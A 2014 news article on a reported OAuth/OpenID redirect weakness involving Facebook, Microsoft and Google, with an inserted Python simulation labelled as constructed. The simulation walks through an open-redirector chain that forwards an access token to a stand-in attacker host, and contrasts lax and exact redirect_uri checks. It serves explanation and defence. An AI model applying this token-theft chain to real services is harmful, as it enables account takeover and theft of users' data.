Popular login services have a security hole, but Facebook and Microsoft can't fix it

Sharif Sakr
May 2, 2014

The recent Heartbleed scare caused a huge stir, even though a patch was available on the day it was disclosed. Other kinds of security holes can't be plugged so readily, and the affected companies therefore have less incentive to publicize them. A researcher in Singapore, Wang Jing, claims to have uncovered a potentially serious example involving the widely used login protocols OAuth and OpenID. He says he has tried to alert the major web services that rely on them, including Facebook, Microsoft and Google, but that they are declining to take responsibility for the issue.

If exploited, the weakness in how OAuth and OpenID are deployed could reportedly allow a malicious website to use a genuine one, such as Facebook.com, to authorize its illicit requests for personal information. The trick does not forge the provider's consent dialog: any pop-up asking the user for approval really does come from the genuine site. Instead, the attacker points the login's return address (the OAuth redirect_uri) at an open redirect on a legitimately registered third-party app, which then forwards the user, token in tow, to the attacker's own domain. That is why the providers say the fault lies elsewhere. According to CNET, Google says it's "tracking the issue," Facebook says it's aware of the problem but that solving it is "something that can't be accomplished in the short-term," and Microsoft says it can't fix something that "exists on the domain of a third party."
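To make the mechanism concrete, here is an added simulation of the flow described above. It is not code from the article, the researcher, or any of the providers named, and everything in it is constructed: the provider provider.example, the registered app app.example.com with its callback at /oauth/callback and an open redirector at /redirect?next=..., the attacker at attacker.example, and the token value. It uses the implicit (response_type=token) flow, in which the token travels in the URL fragment and browsers carry that fragment across a 302 whose Location has none, and it contrasts a lax redirect_uri check (same host is good enough) with an exact-match check.

```python
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed scenario (not from the article): a legitimate third-party app,
# app.example.com, is registered with an OAuth provider, provider.example.
# The app also hosts an open redirector, /redirect?next=<url>, which is the
# "domain of a third party" the providers point at.
REGISTERED_REDIRECT_URI = "https://app.example.com/oauth/callback"
TOKEN = "tok_constructed_for_demo"  # constructed value, never a real token


def lax_redirect_ok(redirect_uri: str) -> bool:
    """Weak provider-side check: any URL on the registered host is accepted."""
    return urlparse(redirect_uri).netloc == urlparse(REGISTERED_REDIRECT_URI).netloc


def strict_redirect_ok(redirect_uri: str) -> bool:
    """Hardened provider-side check: exact match with the registered URI."""
    return redirect_uri == REGISTERED_REDIRECT_URI


def provider_authorize(authorize_url: str,
                       check: Callable[[str], bool]) -> Optional[str]:
    """Provider's authorization endpoint (implicit flow, response_type=token).

    The consent dialog really is served by the provider, so it looks genuine.
    After consent the provider redirects to redirect_uri with the token in the
    URL fragment. Returns the Location the browser is sent to, or None if the
    redirect_uri was rejected and an error page is shown instead.
    """
    params = parse_qs(urlparse(authorize_url).query)
    redirect_uri = params["redirect_uri"][0]
    if not check(redirect_uri):
        return None
    return redirect_uri + "#" + urlencode({"access_token": TOKEN})


def app_handle(url: str) -> Optional[str]:
    """The legitimate app's server. Only /redirect?next=... answers with a 302;
    the returned value is its Location header, which carries no fragment."""
    parts = urlparse(url)
    if parts.netloc == "app.example.com" and parts.path == "/redirect":
        nxt = parse_qs(parts.query).get("next")
        if nxt:
            return nxt[0]  # open redirector: forwards anywhere the caller asks
    return None  # /oauth/callback and everything else: no redirect


def browser_follow(url: str, max_hops: int = 5) -> str:
    """Browser behaviour: follows 302s, and when the Location has no fragment
    of its own the fragment of the current URL is carried along (RFC 7231)."""
    for _ in range(max_hops):
        location = app_handle(url)
        if location is None:
            return url
        fragment = urlparse(url).fragment
        if fragment and not urlparse(location).fragment:
            location += "#" + fragment
        url = location
    return url


def run_attack(check: Callable[[str], bool]) -> Optional[str]:
    """Attacker's link: a genuine provider URL whose redirect_uri is the app's
    open redirector aimed at attacker.example. Returns where the browser ends
    up (token and all), or None if the provider refused the redirect_uri."""
    attacker_redirect = "https://app.example.com/redirect?" + urlencode(
        {"next": "https://attacker.example/steal"})
    link = "https://provider.example/oauth/authorize?" + urlencode({
        "client_id": "example-app",
        "response_type": "token",
        "redirect_uri": attacker_redirect,
    })
    location = provider_authorize(link, check)
    if location is None:
        return None
    return browser_follow(location)


if __name__ == "__main__":
    print("lax check    ->", run_attack(lax_redirect_ok))
    print("strict check ->", run_attack(strict_redirect_ok))
```

With the lax check the browser ends up at attacker.example carrying the access token in the fragment; with the exact-match check the provider refuses before any consent dialog is shown. Note which side each fix belongs to: the provider can tighten redirect_uri matching, but the open redirector itself lives on the app's domain, which is exactly the responsibility gap the quoted statements describe.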

Other security analysts have corroborated Wang's central finding, but some have described it as a "known WONTFIX" or as a fundamental problem with web security as a whole. Either way, the best advice for users is to be wary of links that immediately ask you to log in to Google or Facebook, and to close the tab if that happens rather than let the chain of redirects run. For the sites that plug into these providers, the practical fix is on their side: register exact callback URLs rather than whole domains, and don't host endpoints that redirect to arbitrary user-supplied addresses. As ever, don't assume that the sites and services you use every day are necessarily safe; in the future, we may well look back on these years as the Wild West era of the internet.

[Image credit: Gamma Man/Flickr]
